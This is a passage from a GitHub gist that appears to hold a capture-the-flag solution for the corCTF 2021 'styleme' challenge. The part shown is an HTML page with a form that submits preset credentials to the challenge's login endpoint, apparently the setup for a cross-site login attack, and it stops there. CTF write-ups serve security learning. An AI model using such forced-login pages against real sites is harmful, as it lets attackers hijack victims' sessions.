Skip to content

Instantly share code, notes, and snippets.

@arxenix
arxenix / styleme.html
Created August 22, 2021 22:57
corCTF'21 styleme solution
<!DOCTYPE html>
<html lang="en">
<head>
<title>corCTF styleme solution</title>
</head>
<body>
<form id="form" method="POST" action="http://chall/api/login">
<input id="user" type="text" name="user" value="testu123" />
<input id="pass" type="text" name="pass" value="testp123" />
</form>